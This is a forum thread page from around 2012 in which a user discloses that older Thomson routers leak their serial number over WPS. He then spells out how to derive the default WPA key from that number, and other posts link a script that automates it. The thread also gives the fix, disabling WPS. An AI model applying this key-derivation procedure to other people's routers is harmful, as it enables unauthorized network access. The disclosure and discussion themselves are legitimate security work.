Page 2 of 4 FirstFirst 1234 LastLast
Results 11 to 20 of 35

Thread: What can someone do after discovering a "exploit"?

  1. #11
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: What can someone do after discovering a "exploit"?

    sry, just cant seem to prevent the double posts for some reason
    Last edited by TAPE; 01-23-2012 at 11:52 AM.

  2. #12
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: What can someone do after discovering a "exploit"?

    So, it turns out there was already a tool capable of exploiting what I discovered, the only thing I am is the first person to notice this flaw on the maker routers, and now, bring it to public. The affected router brand is Thomson and, as I recently got access to a latest model of this routers (TG784n)*, I have to re-phrase my initial statement. This flaw can only be found on older models of this brand of routers.

    *: I found a colleague with this kind of router, and he gave me visual access to the router (the only thing I needed to test the flaw) and the wireless key I got trough the calculations differed from the default wireless key found in the sticker. So I assume that newer models (maybe from 2010/11 to the future) do not have this vulnerability.

    In order to explain my findings, I have to introduce some background:
    As some (or all, given that we are on a security related forum) of you may know, back in 2008, Kevin Devine discovered a flaw in SpeedTouch and Thomson routers that would allow him to calculate the default wireless encryption key for each router. He released a tool capable of calculating and providing the user with the default password, only using the last 6 characters of the default SSID (More info @ GNUCitizen.org ).

    But, somewhat around 2010, Thomson fixed this vulnerability by changing the last 6 digits of the default SSID (now they match the last 6 digits of the wireless interface MAC address, instead of the last 6 digits from the sha1 hash [read link above]). Unfortunately, it was still insecure, since with Kevin's findings, it was possible to generate a password list for every router made in 2010/2011 (and now 2012) that would substantially reduce the brute-force attack time against a WPA handshake (I talked about this vulnerability in this forums a while back, a quick search should reveal it). That must be why they changed the whole algorithm in newer models.

    Now, with the recent discovery of WPS vulnerabilities, one of them being that the routers give too much information about themselves, such as maker, model and Serial Number ("Oh!" you say ), it was easy to develop a way to use this information to get the default wireless key:

    Using a tool called wpscan (not the WordPress one) developed by SourceSec, an attacker could get a output like this (values are fictional):
    Code:
    root@bt~#:wpscan -i mon0
    BSSID: 01:23:45:94:0D:89
    ESSID: Thomson940D89
    ----------------------------------------------------------
    Version                           : 0x10
    WPS State                         : 0x02
    Response Type                     : 0x03
    UUID-E                            : 0xcx1x1xex8xfxfx0x8xax7x0xdxdx4x2x
    Manufacturer                      : THOMSON
    Model Name                        : Thomson TG
    Model Number                      : 787
    Serial Number                     : 1011TSABC
    Primary Device Type               : 0x0123456789012345
    Device Name                       : Thomson TG787
    Config Methods                    : 0x0001
    RF Bands                          : 0x00
    From this, an attacker could check if the router has this flaw (by checking the model, in blue) and if it was vulnerable, he would grab the Serial Number and start the calculation process:
    Code:
    1011TSABC
    Add "CP" to the beginning of the string and remove "TS" value (always the 2 characters in-between the first 4 numbers and the last 3 characters):
    Code:
    CP1011ABC
    Convert last 3 characters to hexadecimal (and convert lowercase to uppercase, case it has letters):
    Code:
    CP1011414243
    Process this last string trough sha-1:
    Code:
    8d6bea96fc2eb7b52020c45492e379cab1940d89
    Grab the first 10 digits, Uppercase them, and here is the default wireless key:
    Code:
    8D6BEA96FC
    Note: If you're going to test this, please try to isolate your AP on a specific channel, airodump that channel and run wpscan after. I'm telling you this because "WPScan actively sends 802.11 probe requests to access points that advertise WPS support", and that could be considered illegal (I'm not sure, but just to be safe...).

    Cheers!

    P.S.: This vulnerability can be fixed by turning off WPS, wich is enabled by default. It can be done trough telnet (never found the option on the web interface), this site will help with the commands needed. Obviously, even after turning off WPS, the router will not be secure if it has the default password set (due to the other vulnerabilities I mentioned earlier).
    Last edited by Snayler; 07-21-2012 at 11:24 PM.

  3. #13
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: What can someone do after discovering a "exploit"?

    Hi again! Someone edited the wpscan.py script to include the hash calculations for Thomson routers. If you want to give it a try, here's the modified code:
    pastebin - wps2key.py
    Last edited by Snayler; 07-21-2012 at 07:55 AM.

  4. #14
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: What can someone do after discovering a "exploit"?

    Quote Originally Posted by Snayler View Post
    Code:
    CP1011ABC
    Convert last 3 characters to hexadecimal (and convert lowercase to uppercase, case it has letters):
    Code:
    CP1011414243
    Hi Snayler.. many thanks for sharing this knowledge. I am having a little difficulties understanding this above step.
    Can you please explain however did you arrive '414243' from 'ABC'?

    Many thanks

    Hannah

  5. #15
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: What can someone do after discovering a "exploit"?

    Quote Originally Posted by hannah View Post
    Can you please explain however did you arrive '414243' from 'ABC'?
    I get '414243' from 'ABC' by converting ascii values to hexadecimal values. The following links should help:
    Code:
    http://centricle.com/tools/ascii-hex/
    http://www.asciitable.com/index/asciifull.gif
    There's also a tool available that can exploit this:
    Code:
    http://pastebin.ca/2110985

  6. #16
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: What can someone do after discovering a "exploit"?

    Hey Snayler

    Thanks a lot for such a quick reply. Really appreciate it. And yes I already tested the script from http://pastebin.ca/2110985

    Just really wanted to learn the process.. Thanks again.

    I find the this forum is very quiet these days. Hope all are doing pretty good.
    Regards

  7. #17
    Junior Member
    Join Date
    Jun 2012
    Posts
    42

    Default Re: What can someone do after discovering a "exploit"?

    @Snayler this is very interesting. I suspect many router vendors employ similar means to derive default WPA keys. Since the key is ultimately the product of the non-reversible SHA1 hash function, I wonder, how did you derive the algorithm, specifically the part about adding CP and removing TS? Did you just play around with serial numbers until you figured it out?

  8. #18
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: What can someone do after discovering a "exploit"?

    Quote Originally Posted by ternarybit View Post
    Did you just play around with serial numbers until you figured it out?
    As mentioned in post #12 please read this blog posting..

    http://www.gnucitizen.org/blog/defau...e-hub-routers/

    It's mentioned in quite a detail there.

  9. #19
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: What can someone do after discovering a "exploit"?

    Quote Originally Posted by ternarybit View Post
    @Snayler this is very interesting. I suspect many router vendors employ similar means to derive default WPA keys. Since the key is ultimately the product of the non-reversible SHA1 hash function, I wonder, how did you derive the algorithm, specifically the part about adding CP and removing TS? Did you just play around with serial numbers until you figured it out?
    No! I'm not that smart Back in April 2008, Kevin Devine discovered that flaw (calculating the default password from the serial number) and created a PoC where you can calculate all possible default passwords based on the last 6 chars of the default SSID. Around 2009/2010, Thomson (I guess) fixed this issue by changing the last chars of the SSID to the last 6 chars of the AP's MAC address. This fixed the vulnerability found by Kevin, but I discovered that the router freely announces it's serial number through WPS. So I just had to check Kevin's discovery on how to calculate the default password from the serial number and ta-da! Vulnerability found. If you want, you can read more about Kevin's findings in the link posted by hannah. If you want a more hardcore explanation, you can read it here:
    Code:
    http://www.hakim.ws/st585/KevinDevine/
    Cheers!
    Last edited by Snayler; 07-21-2012 at 11:26 PM.

  10. #20
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: What can someone do after discovering a "exploit"?

    @Snayler

    thanks for this link...
    http://www.hakim.ws/st585/KevinDevine/

    let's dig in..

Page 2 of 4 FirstFirst 1234 LastLast

Similar Threads

  1. Replies: 5
    Last Post: 03-26-2012, 11:42 AM
  2. Replies: 4
    Last Post: 02-24-2011, 04:52 PM
  3. Win2003 / R2 und exploit "ms08_067" Problem
    By Drake379 in forum Anfänger Ecke
    Replies: 3
    Last Post: 05-10-2010, 05:54 AM
  4. Video Demo "Vom POC zum Exploit SEH" by ozzy
    By ozzy66 in forum Tutorials und Howtos
    Replies: 5
    Last Post: 01-20-2010, 10:41 AM
  5. msfcli cannot load "listening" exploit?
    By bruk0ut in forum OLD BT4beta Bugs and Fixes
    Replies: 8
    Last Post: 03-10-2009, 07:53 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •